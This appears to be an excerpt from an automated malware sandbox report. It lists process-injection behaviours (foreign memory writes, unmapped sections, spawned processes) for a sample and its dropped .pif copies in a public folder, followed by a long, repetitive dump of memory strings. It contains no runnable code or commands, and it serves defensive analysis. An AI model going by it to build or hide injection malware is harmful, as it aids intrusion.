Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section unmapped: C:\Users\user\Desktop\yxU3AgeVTi.exe base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section unmapped: C:\Users\Public\Libraries\jphwmyiA.pif base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Memory written: C:\Users\Public\Libraries\jphwmyiA.pif base: 26E008	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Memory written: C:\Users\Public\Libraries\jphwmyiA.pif base: 3FD008	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Memory written: C:\Users\Public\Libraries\jphwmyiA.pif base: 29E008

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Process created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Process created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Process created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif

Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8"
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<]k%
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qBz*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4@i*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx a%
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|Rx*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT:>*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpKm*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|a3*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\| T*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|hd*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$}t
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8E
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8@\*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8C
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8A
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8M
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8H
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlKy%
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q85
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd.w*
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q80
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,:4*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtK`*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8<
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8:
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q88
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q87
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhvy*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8e
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx~\%
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8m
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8l
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qBx%
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<]m*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt o*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8j
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxhq*
Source: jphwmyiA.pif, 0000000C.00000003.3505492923.000000001BBBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8h
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8g
Source: jphwmyiA.pif, 00000007.00000003.3505509226.000000002A7E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qm
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q s\|
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0@w*
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8O
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qth}%
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8[
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qr
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qy
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8Y
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp {%
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qw
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql^?*
Source: jphwmyiA.pif, 00000007.00000003.3505509226.000000002A7E6000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8V
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlK{*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx b*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8n
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|hc%
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8}
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8\|
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD^5*
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<
Source: jphwmyiA.pif, 0000000C.00000003.3505492923.000000001BBBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q;
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@
Source: jphwmyiA.pif, 00000003.00000003.3755563974.0000000025A16000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`xQ%
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT^~
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpv^*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP S%
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q>
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4&
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`Yu*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\'^%
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4%
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`o`%
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql.\*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4$
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qG
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q-
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qN
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`'Q*
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qdoS*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q2
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`h0*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|KD*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(#q%
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qa
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4=
Source: jphwmyiA.pif, 00000003.00000003.4085462700.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4<
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH5t*
Source: jphwmyiA.pif, 0000000C.00000003.3505492923.000000001BBBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4G
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4E
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4C
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qf
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPRv%
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qQ
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4+
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qO
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh.g%
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(dO*
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qS
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtvP*
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q45
Source: jphwmyiA.pif, 0000000C.00000003.3505492923.000000001BBBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qY
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp.N*
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXR]*
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q42
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4`
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4[
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT'x%
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4@g%
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4g
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhDU*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$d]*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\'_*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`oa*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4M
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4J
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qls
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4T
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4R
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q!
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpKk%
